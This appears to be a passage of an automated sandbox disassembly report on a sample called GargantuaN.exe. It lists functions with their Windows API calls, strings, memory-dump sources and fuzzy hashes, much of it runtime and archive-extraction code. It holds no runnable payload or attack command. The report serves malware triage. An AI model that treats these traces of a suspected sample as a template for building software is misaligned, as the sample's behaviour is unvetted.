                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                        • API String ID: 2141747552-1753850145
                                                        • Opcode ID: 3d35b96dd97eb73efdeca30ad8807184fa19b366d23b822fcfaa42f2615256b2
                                                        • Instruction ID: 99395519e481f15b24fc858dfe408ae12bc11787cf721654d0c25bb5cbb3fc8a
                                                        • Opcode Fuzzy Hash: 3d35b96dd97eb73efdeca30ad8807184fa19b366d23b822fcfaa42f2615256b2
                                                        • Instruction Fuzzy Hash: 95E04F709107429EDB20AF34D849B127AD4AF04F05F14885DE8DED3640D6B4D5448B70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D72BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AdjustPointer$_abort
                                                        • String ID:
                                                        • API String ID: 2252061734-0
                                                        • Opcode ID: f16173ea0127cacccd18f3d5beca992c249a6a9b5aee6106d2f62467f9cde439
                                                        • Instruction ID: 53716749707f884ab92222f40868c43cf42f610c5a2f55b5b6eb57ce002c13fd
                                                        • Opcode Fuzzy Hash: f16173ea0127cacccd18f3d5beca992c249a6a9b5aee6106d2f62467f9cde439
                                                        • Instruction Fuzzy Hash: 4E519172601252EFDB299F14D846BBA77A4FF64310F28852DE849876A1F731ED80D7B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00D7BF39
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7BF5C
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7BF82
                                                        • _free.LIBCMT ref: 00D7BF95
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7BFA4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: 0c5860853f9ffcac8b7314ac4747f3d6f1ed4d730f3f84b64ea43a4846640230
                                                        • Instruction ID: 17cae44f02b9ef15a96ba5742c920d30fd22a9dcb299cfdee67341a864f05086
                                                        • Opcode Fuzzy Hash: 0c5860853f9ffcac8b7314ac4747f3d6f1ed4d730f3f84b64ea43a4846640230
                                                        • Instruction Fuzzy Hash: 390184726157157F23211A765C4DE7BAA6DDEC2FB1319812AF90CC2241FF62CD0196B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D79869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00D791AD,00D7B188,?,00D79813,00000001,00000364,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D7986E
                                                        • _free.LIBCMT ref: 00D798A3
                                                        • _free.LIBCMT ref: 00D798CA
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D798D7
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D798E0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: f4a6b9164906635303fec3b25caca804e5af6e6bd815d4fb9ce04ac114778dde
                                                        • Instruction ID: 77a78832da5f4e360aa2ef499bd69043ac7ff1441e02d4e9336c76328ceca304
                                                        • Opcode Fuzzy Hash: f4a6b9164906635303fec3b25caca804e5af6e6bd815d4fb9ce04ac114778dde
                                                        • Instruction Fuzzy Hash: 0601F437254B016FC2222728ACAAD2FA629DFD27707258236F50DD2292FE20CD015272
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D60EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D611CF: ResetEvent.KERNEL32(?), ref: 00D611E1
                                                          • Part of subcall function 00D611CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D611F5
                                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D60F21
                                                        • CloseHandle.KERNEL32(?,?), ref: 00D60F3B
                                                        • DeleteCriticalSection.KERNEL32(?), ref: 00D60F54
                                                        • CloseHandle.KERNEL32(?), ref: 00D60F60
                                                        • CloseHandle.KERNEL32(?), ref: 00D60F6C
                                                          • Part of subcall function 00D60FE4: WaitForSingleObject.KERNEL32(?,000000FF,00D61206,?), ref: 00D60FEA
                                                          • Part of subcall function 00D60FE4: GetLastError.KERNEL32(?), ref: 00D60FF6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                        • String ID:
                                                        • API String ID: 1868215902-0
                                                        • Opcode ID: cd44e04ab0714bf506a621956286a0b2110a8e07921df53470ad78cbfa5ff414
                                                        • Instruction ID: 1a5db6e9eb446457f191e82e679214e015170d91197aa11d71290682e5fd7807
                                                        • Opcode Fuzzy Hash: cd44e04ab0714bf506a621956286a0b2110a8e07921df53470ad78cbfa5ff414
                                                        • Instruction Fuzzy Hash: CC015E72110744EFC7229F64DC85BCABBA9FB08B10F000929F26A92260CB757A44DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00D7C817
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D7C829
                                                        • _free.LIBCMT ref: 00D7C83B
                                                        • _free.LIBCMT ref: 00D7C84D
                                                        • _free.LIBCMT ref: 00D7C85F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 13dcd67fe1cc59c523cf9d6fdcc5b218288a0c98c53ce973c68d42a6f9b68a17
                                                        • Instruction ID: 0b5474b0f4ff3df22e6e62ab315b681de244ef1b7c370a1a71d134b8066c4118
                                                        • Opcode Fuzzy Hash: 13dcd67fe1cc59c523cf9d6fdcc5b218288a0c98c53ce973c68d42a6f9b68a17
                                                        • Instruction Fuzzy Hash: E7F01272564600AFC621DB69F48AC1673E9EB14724768A81EF10CD7652EB70FC80CB75
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D61FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D61FE5
                                                        • _wcslen.LIBCMT ref: 00D61FF6
                                                        • _wcslen.LIBCMT ref: 00D62006
                                                        • _wcslen.LIBCMT ref: 00D62014
                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D5B371,?,?,00000000,?,?,?), ref: 00D6202F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CompareString
                                                        • String ID:
                                                        • API String ID: 3397213944-0
                                                        • Opcode ID: ab3806a107eb196b9c563d9e1722c10b5f8b193f03206b9e56a353c0849a1994
                                                        • Instruction ID: 6ee291bb878294b50c5a71b3bedd59a3cb5db2419d4a9bc0e809a1b540e31f90
                                                        • Opcode Fuzzy Hash: ab3806a107eb196b9c563d9e1722c10b5f8b193f03206b9e56a353c0849a1994
                                                        • Instruction Fuzzy Hash: 9DF01732008114BFCF226F55EC09DDA7F26EB44B60B21C515FA1A9A061DB72D6A1EAB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D78900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00D7891E
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D78930
                                                        • _free.LIBCMT ref: 00D78943
                                                        • _free.LIBCMT ref: 00D78954
                                                        • _free.LIBCMT ref: 00D78965
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 8f222024c6d34f3bd054e67b48b0e164aa9b33414b1638a850669ddb0bb26917
                                                        • Instruction ID: 99ec76420363fe86e10566c84bd0ab830111b3442852791a0757b028d406f7c4
                                                        • Opcode Fuzzy Hash: 8f222024c6d34f3bd054e67b48b0e164aa9b33414b1638a850669ddb0bb26917
                                                        • Instruction Fuzzy Hash: 3FF0D472860326DFCA66BF29FC064293BA1FB257243055706F518DA3B2EB314941AFB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D615FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _swprintf
                                                        • String ID: %ls$%s: %s
                                                        • API String ID: 589789837-2259941744
                                                        • Opcode ID: d736bbc14d4583e2346545a0174e8be2138d78dfb228fa9350c420f2d9ed9bf5
                                                        • Instruction ID: 68011e019ca6d31e45684d145c20a073f9fe3f9e4734b626522b02971bd8d71b
                                                        • Opcode Fuzzy Hash: d736bbc14d4583e2346545a0174e8be2138d78dfb228fa9350c420f2d9ed9bf5
                                                        • Instruction Fuzzy Hash: 6951193E288304FBEA252AD4CD46F357365EB05B05F2C4A06F7C6A54E1C9A2E510A77B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D77F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\GargantuaN.exe,00000104), ref: 00D77FAE
                                                        • _free.LIBCMT ref: 00D78079
                                                        • _free.LIBCMT ref: 00D78083
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\AppData\Local\Temp\GargantuaN.exe
                                                        • API String ID: 2506810119-2795930919
                                                        • Opcode ID: d6f2150cc8e4692ca60ad08d4d39023f2558741fde36304b068f4559e20440f0
                                                        • Instruction ID: cfdd7d2a7166d28d6cf0df572402b46f0030b9154a5507e79133155655c8ee57
                                                        • Opcode Fuzzy Hash: d6f2150cc8e4692ca60ad08d4d39023f2558741fde36304b068f4559e20440f0
                                                        • Instruction Fuzzy Hash: 18319271A40218EFDB21DF99D889DAEBBBCEF85350F148166F908D7211EA708A44DB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D731D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D731FB
                                                        • _abort.LIBCMT ref: 00D73306
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer_abort
                                                        • String ID: MOC$RCC
                                                        • API String ID: 948111806-2084237596
                                                        • Opcode ID: 012813ee82021872eb160098a04f013d540530d3f3ed753cc954ab8b06fe9a6d
                                                        • Instruction ID: 65e064ed5eee9dc67f2f874af02fa42d4a4b7d59a4105c953be25b524906fb87
                                                        • Opcode Fuzzy Hash: 012813ee82021872eb160098a04f013d540530d3f3ed753cc954ab8b06fe9a6d
                                                        • Instruction Fuzzy Hash: F7414C71900209AFCF15DF98CD85AEEBBB6FF48304F188059F90867262E3359A50EB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D57401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D57406
                                                          • Part of subcall function 00D53BBA: __EH_prolog.LIBCMT ref: 00D53BBF
                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D574CD
                                                          • Part of subcall function 00D57A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57AAB
                                                          • Part of subcall function 00D57A9C: GetLastError.KERNEL32 ref: 00D57AF1
                                                          • Part of subcall function 00D57A9C: CloseHandle.KERNEL32(?), ref: 00D57B00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                        • API String ID: 3813983858-639343689
                                                        • Opcode ID: d01e8bcd6c262ab1d52e737e2ce24015e84ca946187c8ff2fd4489040168d609
                                                        • Instruction ID: ba3d603c43f223ecf97ef2a998b635c763946af22a03aec2261c28d9caa41149
                                                        • Opcode Fuzzy Hash: d01e8bcd6c262ab1d52e737e2ce24015e84ca946187c8ff2fd4489040168d609
                                                        • Instruction Fuzzy Hash: 7E319071904259AAEF11EBA4EC45BEE7BB8EF05306F184016FC09E7282D7748A488B70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6AD98
                                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D6ADAD
                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6ADC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: ASKNEXTVOL
                                                        • API String ID: 445417207-3402441367
                                                        • Opcode ID: ed628be57f00e2ba953061581f01f718d5497d9844ddbe62b9acff2be6ed9d28
                                                        • Instruction ID: 1e7bd5403cd227468ec74e4ffcd21698684e3c556683b780af830b550882b30c
                                                        • Opcode Fuzzy Hash: ed628be57f00e2ba953061581f01f718d5497d9844ddbe62b9acff2be6ed9d28
                                                        • Instruction Fuzzy Hash: C0118E32280300FFD6119F6CDC45FAA7BA9EF4A742F540510F681EB6A0D762D9159F36
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __fprintf_l.LIBCMT ref: 00D5D954
                                                        • _strncpy.LIBCMT ref: 00D5D99A
                                                          • Part of subcall function 00D61DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D91030,00000200,00D5D928,00000000,?,00000050,00D91030), ref: 00D61DC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                        • String ID: $%s$@%s
                                                        • API String ID: 562999700-834177443
                                                        • Opcode ID: 89fea8380262702f3b68c25cbc155ef1e016b85d3f47080beb48f8e3a2805106
                                                        • Instruction ID: 399207c027173336bb980e26997ec049c8dc22c748268ca7733914a77f84e6dd
                                                        • Opcode Fuzzy Hash: 89fea8380262702f3b68c25cbc155ef1e016b85d3f47080beb48f8e3a2805106
                                                        • Instruction Fuzzy Hash: 44218C72440248AEDF30EEA4CC06FEE7BA9AF05701F084426FD55961A2E272D64CCF71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D60E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D5AC5A,00000008,?,00000000,?,00D5D22D,?,00000000), ref: 00D60E85
                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D5AC5A,00000008,?,00000000,?,00D5D22D,?,00000000), ref: 00D60E8F
                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D5AC5A,00000008,?,00000000,?,00D5D22D,?,00000000), ref: 00D60E9F
                                                        Strings
